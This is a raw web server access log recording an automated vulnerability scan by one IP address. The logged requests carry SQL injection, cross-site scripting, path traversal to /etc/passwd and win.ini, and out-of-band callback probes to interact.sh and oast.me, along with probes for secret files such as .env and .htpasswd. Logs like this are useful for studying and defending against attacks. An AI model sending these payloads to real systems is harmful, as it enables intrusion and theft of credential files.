195.164.49.69 - - [20/Oct/2024:20:13:23 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:13:25 +0000] POST /servlet/GetProductVersion HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:20:13:58 +0000] POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:14:00 +0000] POST /admin/asign-single-student-subjects.php HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:20:14:22 +0000] GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:20:14:23 +0000] GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:20:14:52 +0000] POST /mod/lti/auth.php HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:20:14:56 +0000] GET /index.php?module=users/login HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:15:03 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:15:06 +0000] GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:20:15:41 +0000] POST /superadmincreate.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:20:15:44 +0000] GET /b_download/index.html HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:20:15:45 +0000] GET /b_download/index.html HTTP/1.1 404 1099
83.212.98.101 - - [20/Oct/2024:20:15:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:20:15:48 +0000] GET /signin HTTP/1.1 404 1080
- - - [20/Oct/2024:20:15:53 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:15:54 +0000] POST /ajax/calendar.php HTTP/1.1 404 1095
- - - [20/Oct/2024:20:15:56 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:15:59 +0000] POST /Admin/login.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:20:16:00 +0000] GET /Admin/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:20:16:35 +0000] GET /admin.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:16:35 +0000] GET /admin.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:16:36 +0000] GET /adminer.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:20:16:36 +0000] GET /xmlrpc.php HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:20:16:36 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:20:16:36 +0000] GET /cpanel.php HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:20:16:36 +0000] GET /php-info.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:16:36 +0000] GET /php_info.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:16:36 +0000] GET /phpinfo.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:20:16:36 +0000] GET /info.php HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:20:16:37 +0000] GET /adminer.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:20:16:37 +0000] GET /xmlrpc.php HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:20:16:37 +0000] GET /bin/cron.php HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:16:37 +0000] GET /cache/index.tpl.php HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:20:16:48 +0000] GET /html/usr/share/doc/hostname/copyright%3f HTTP/1.1 404 1134
195.164.49.69 - - [20/Oct/2024:20:16:50 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:16:52 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:17:00 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:17:03 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:17:05 +0000] POST /?wicket:interface=:0:userPanel:loginForm::IFormSubmitListener:: HTTP/1.1 200 11204
83.212.98.101 - - [20/Oct/2024:20:17:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:20:17:45 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:45 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:45 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:47 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:47 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:47 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:47 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:47 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:47 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:47 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:47 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:48 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:48 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:48 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:49 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:49 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:49 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:49 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:49 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:49 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:50 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:50 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:50 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:50 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:17:50 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:18:00 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:18:00 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:18:00 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:18:02 +0000] GET /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:18:06 +0000] POST /zabbix/index.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:20:18:07 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:18:17 +0000] GET /slr/application/configs/application.ini HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:20:18:19 +0000] GET /application/configs/application.ini HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:20:18:19 +0000] GET /admin/configs/application.ini HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:20:18:19 +0000] GET /application.ini HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:20:18:19 +0000] GET /aplicacao/application/configs/application.ini HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:20:18:19 +0000] GET /cloudexp/application/configs/application.ini HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:20:18:19 +0000] GET /cms/application/configs/application.ini HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:20:18:19 +0000] GET /moto/application/configs/application.ini HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:20:18:20 +0000] GET /Partners/application/configs/application.ini HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:20:18:20 +0000] GET /radio/application/configs/application.ini HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:20:18:20 +0000] GET /seminovos/application/configs/application.ini HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:20:18:20 +0000] GET /shop/application/configs/application.ini HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:20:18:20 +0000] GET /site_cg/application/configs/application.ini HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:20:18:36 +0000] GET /api/presets/?filter=true HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:20:19:01 +0000] GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1 404 1172
195.164.49.69 - - [20/Oct/2024:20:19:02 +0000] GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1 404 1174
195.164.49.69 - - [20/Oct/2024:20:19:02 +0000] GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1 404 1175
195.164.49.69 - - [20/Oct/2024:20:19:02 +0000] GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1 404 1167
195.164.49.69 - - [20/Oct/2024:20:19:03 +0000] GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1 404 1171
195.164.49.69 - - [20/Oct/2024:20:19:04 +0000] GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1 404 1173
195.164.49.69 - - [20/Oct/2024:20:19:04 +0000] GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1 404 1174
195.164.49.69 - - [20/Oct/2024:20:19:05 +0000] GET /actuator/jolokia/read/java.lang:type=Memory HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:20:19:05 +0000] GET /jolokia/read/java.lang:type=Memory HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:20:19:05 +0000] GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1 404 1159
195.164.49.69 - - [20/Oct/2024:20:19:05 +0000] GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1 404 1161
195.164.49.69 - - [20/Oct/2024:20:19:06 +0000] GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1 404 1162
195.164.49.69 - - [20/Oct/2024:20:19:07 +0000] GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1 404 1154
195.164.49.69 - - [20/Oct/2024:20:19:07 +0000] GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1 404 1161
195.164.49.69 - - [20/Oct/2024:20:19:07 +0000] GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1 404 1158
195.164.49.69 - - [20/Oct/2024:20:19:07 +0000] GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1 404 1160
195.164.49.69 - - [20/Oct/2024:20:19:09 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:19:25 +0000] GET /phpMyAdminOLD/setup/index.php HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:20:19:30 +0000] GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:20:19:32 +0000] GET /phpmyadmin/setup/ HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:20:19:32 +0000] GET /sysadmin/phpMyAdmin/scripts/setup.php HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:20:19:32 +0000] GET /phpmyadmin/setup/index.php HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:20:19:32 +0000] GET /pma/setup/index.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:19:32 +0000] GET /admin/pma/setup/index.php HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:20:19:32 +0000] GET /setup/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:20:19:32 +0000] GET /admin/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:20:19:32 +0000] GET /php/phpmyadmin/scripts/setup.php HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:20:19:33 +0000] GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:20:19:33 +0000] GET /web/phpmyadmin/scripts/setup.php HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:20:19:35 +0000] GET /phpmyadmin/scripts/setup.php HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:20:19:35 +0000] GET /phpMyAdmin/scripts/setup.php HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:20:19:36 +0000] GET /_phpmyadmin/scripts/setup.php HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:20:19:36 +0000] GET /forum/phpmyadmin/scripts/setup.php HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:20:20:12 +0000] GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1 404 1211
195.164.49.69 - - [20/Oct/2024:20:20:13 +0000] GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1 404 1141
195.164.49.69 - - [20/Oct/2024:20:20:13 +0000] GET /./../../../../../../../../../../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:20:13 +0000] GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1 404 1170
195.164.49.69 - - [20/Oct/2024:20:20:13 +0000] GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:20:13 +0000] GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1 404 1141
195.164.49.69 - - [20/Oct/2024:20:20:13 +0000] GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:20:13 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1 404 1229
195.164.49.69 - - [20/Oct/2024:20:20:14 +0000] GET /?redirect=..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:20:14 +0000] GET /?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:20:14 +0000] GET /?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:20:14 +0000] GET /..///////..////..//////windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:20:14 +0000] GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:20:14 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1 404 1144
195.164.49.69 - - [20/Oct/2024:20:20:14 +0000] GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00 HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:20:15 +0000] GET /index.php?page=windows/win.ini HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:20:15 +0000] GET /index.php?page=windows/win.ini%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:20:15 +0000] GET /index.php?page=../../windows/win.ini HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:20:15 +0000] GET /index.php?page=....//....//windows/win.ini HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:20:15 +0000] GET /.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:20:15 +0000] GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1 404 1226
195.164.49.69 - - [20/Oct/2024:20:20:15 +0000] GET /../../../../../../../../../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:20:27 +0000] GET /servicedesk/customer/user/signup HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:20:20:29 +0000] POST /servicedesk/customer/user/signup HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:20:20:31 +0000] GET /secure/Signup!default.jspa HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:20:20:33 +0000] POST /secure/Signup.jspa HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:20:20:35 +0000] GET /user/requireLogin HTTP/1.1 404 1095
83.212.98.101 - - [20/Oct/2024:20:20:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:20:20:47 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:20:48 +0000] GET /ocp.php HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:20:20:51 +0000] GET /index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../etc/ HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:20:53 +0000] GET /website/lang/en_US?r=https://interact.sh/ HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:20:20:55 +0000] GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:20:21:16 +0000] GET /components/statestore HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:20:21:18 +0000] GET /overview HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:20:21:20 +0000] GET /controlplane HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:21:22 +0000] GET /.gitlab-ci.yml HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:20:21:24 +0000] GET /gitlab-ci.yml HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:20:21:26 +0000] GET /.gitlab-ci/variables.yml HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:20:21:28 +0000] GET /etc/acs-commons/jcr-compare.html HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:20:21:30 +0000] GET /etc/acs-commons/workflow-remover.html HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:20:21:32 +0000] GET /etc/acs-commons/version-compare.html HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:20:21:34 +0000] GET /etc/acs-commons/oak-index-manager.html HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:20:21:36 +0000] GET /jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22 HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:20:21:38 +0000] GET /wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:21:40 +0000] GET /sidekiq HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:20:21:42 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:21:44 +0000] GET /index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:22:06 +0000] GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1 404 1127
83.212.98.101 - - [20/Oct/2024:20:22:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:20:22:27 +0000] GET /Images/Remote?imageUrl=https://oast.me/ HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:20:22:29 +0000] GET /Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB HTTP/1.1 404 1106
- - - [20/Oct/2024:20:22:31 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:22:33 +0000] GET /api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:20:22:35 +0000] GET /wp-content/backups-dup-lite/tmp/ HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:20:22:37 +0000] GET /wp-content/backups-dup-pro/tmp/ HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:20:22:39 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:22:41 +0000] POST /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:20:22:43 +0000] GET /index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
- - - [20/Oct/2024:20:23:05 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:23:07 +0000] GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1 404 1047
195.164.49.69 - - [20/Oct/2024:20:23:09 +0000] GET /xwiki/bin/view/Main/?viewer=share&send=1&target&target=%3Cimg+src+onerror%3Dalert%28document.domain%29%3E&includeDocument=inline&message=2niTrjeqSRPswO87joE7MEkE1DJ HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:20:23:11 +0000] GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:23:33 +0000] GET /wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:20:23:35 +0000] GET /api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:20:23:58 +0000] GET /contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:20:24:00 +0000] GET /getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:20:24:22 +0000] GET /Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:20:24:24 +0000] GET /kylin/api/admin/config HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:20:24:26 +0000] GET /?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:24:28 +0000] GET /loginLess/../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:24:50 +0000] GET /api/index.php/v1/config/application?public=true HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:20:24:51 +0000] GET /api/v1/config/application?public=true HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:20:25:11 +0000] GET /.htpasswd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:25:33 +0000] GET /setup/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:20:25:35 +0000] GET /go.php?http://interact.sh HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:20:25:37 +0000] GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1 404 1116
83.212.98.101 - - [20/Oct/2024:20:25:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
- - - [20/Oct/2024:20:25:59 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:20:26:01 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:20:26:03 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:26:05 +0000] GET /wp-content/uploads/wpdm-cache/ HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:20:26:07 +0000] GET /templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:20:26:09 +0000] GET /transmission/web/ HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:20:26:11 +0000] GET /scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:26:32 +0000] GET /config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:20:26:34 +0000] GET /index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:26:56 +0000] GET /_next/../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:27:17 +0000] GET /ajax/telemetry.php HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:20:27:19 +0000] GET /glpi/ajax/telemetry.php HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:20:27:22 +0000] GET /api/snapshots/:key HTTP/1.1 404 1100
83.212.98.101 - - [20/Oct/2024:20:27:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:20:27:43 +0000] GET /steve/services/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/services/ HTTP/1.1 404 1176
195.164.49.69 - - [20/Oct/2024:20:27:45 +0000] GET /services/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/services/ HTTP/1.1 404 1166
- - - [20/Oct/2024:20:28:07 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:28:09 +0000] GET /_ignition/health-check HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:20:28:11 +0000] GET /login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:20:28:13 +0000] GET /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
- - - [20/Oct/2024:20:28:35 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:28:57 +0000] GET /vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:20:28:59 +0000] GET /vendor/phpfastcache/phpfastcache/examples/phpinfo.php HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:20:29:01 +0000] GET /search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:20:29:22 +0000] GET /api/2.0/preview/mlflow/experiments/list HTTP/1.1 404 1133
195.164.49.69 - - [20/Oct/2024:20:29:24 +0000] GET /friends/ajax_invite?mode=model%27)%3balert(document.domain)%2f%2f;' HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:20:29:26 +0000] GET /solr/admin/metrics HTTP/1.1 404 1100
